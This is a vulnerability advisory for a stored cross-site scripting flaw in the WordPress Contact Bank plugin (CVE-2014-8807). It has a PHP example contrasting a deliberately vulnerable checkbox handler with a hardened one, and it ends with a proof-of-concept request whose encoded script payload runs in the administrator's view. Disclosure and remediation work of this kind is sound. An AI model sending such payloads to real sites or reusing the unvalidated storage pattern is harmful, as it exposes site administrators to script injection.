WP Contact Bank Standard Edition 2.0.69 XSS

Homepage:

https://wordpress.org/plugins/contact-bank/

CVE-ID

CVE-2014-8807

CVSS Score

4.3

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:N/A:N)

Description:

Data from checkbox fields is neither validated nor escaped when it is written to the database (contact_bank_frontend-class.php, lines 102-123).

If a form contains at least one checkbox field, an unauthenticated visitor can submit a script payload through it. The payload is stored with the submission and rendered unescaped in the administrator's view of collected form data: wp-admin/admin.php?page=frontend_data
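The following PHP is an added example, not code from the Contact Bank plugin: a hypothetical submission handler showing the two controls that the checkbox path lacks, validation and sanitisation when the value is written, and escaping when it is rendered for the administrator. The function names, the table name (assumed_contact_bank_data) and the $allowed_options parameter are assumptions for illustration; the field name and form ID are the ones used in the proof of concept below.

```php
<?php
// Added example (not the plugin's code). Assumes WordPress is loaded so that
// sanitize_text_field(), wp_unslash(), absint(), esc_html() and $wpdb exist.

// Vulnerable pattern (hypothetical, mirrors what the advisory describes):
// checkbox values are taken from the request as-is and stored unchanged.
function vulnerable_store_checkbox( $field_name, array $request, wpdb $wpdb, $form_id ) {
    $values = isset( $request[ $field_name ] ) ? (array) $request[ $field_name ] : array();
    // "<script>alert(...)</script>" goes straight into the table here.
    $wpdb->insert(
        $wpdb->prefix . 'assumed_contact_bank_data',   // table name is an assumption
        array( 'form_id' => $form_id, 'field' => $field_name, 'value' => implode( ',', $values ) )
    );
}

// Hardened pattern: reject anything that is not one of the options the form
// actually defines, sanitise each element, and bind types on the insert.
function hardened_store_checkbox( $field_name, array $request, array $allowed_options, wpdb $wpdb, $form_id ) {
    $raw   = isset( $request[ $field_name ] ) ? (array) $request[ $field_name ] : array();
    $clean = array();

    foreach ( $raw as $value ) {
        if ( ! is_string( $value ) ) {
            continue;                                   // nested arrays are never a valid checkbox value
        }
        $value = sanitize_text_field( wp_unslash( $value ) ); // strips tags, control chars, surrounding whitespace
        if ( in_array( $value, $allowed_options, true ) ) {   // whitelist: only options the form defines
            $clean[] = $value;
        }
    }

    $wpdb->insert(
        $wpdb->prefix . 'assumed_contact_bank_data',
        array(
            'form_id' => absint( $form_id ),
            'field'   => sanitize_key( $field_name ),   // the field name itself also comes from the request
            'value'   => implode( ',', $clean ),
        ),
        array( '%d', '%s', '%s' )
    );
}

// Output side: stored data is still untrusted when it is shown to the admin,
// so it is escaped at the point of rendering regardless of what was validated on input.
function render_submission_cell( $stored_value ) {
    return '<td>' . esc_html( $stored_value ) . '</td>';
}

// Usage in the admin-ajax handler for the PoC's form (field 11111_chk, form ID 1):
// hardened_store_checkbox( '11111_chk', $_REQUEST, array( 'Yes', 'No' ), $wpdb, 1 );
```

Validating against the form's own option list is what makes the input side robust: a checkbox can only ever carry one of a known set of values, so anything else is an attack or a bug, not data worth storing. Output escaping is kept as a second layer because the admin page must not depend on every write path having been fixed.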

Proof of Concept:

We assume the form has one checkbox field named 11111_chk and that the form ID is 1. The encoded parameter in the request below decodes to <script>alert(String.fromCharCode(88,83,83));</script>; the payload is stored on submission and executes when an administrator opens wp-admin/admin.php?page=frontend_data.

http://wordpress-instalation/wp-admin/admin-ajax.php?action=frontend_contact_form_library&param=frontend_submit_controls&form_id=1&11111_chk[]=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E

Timeline: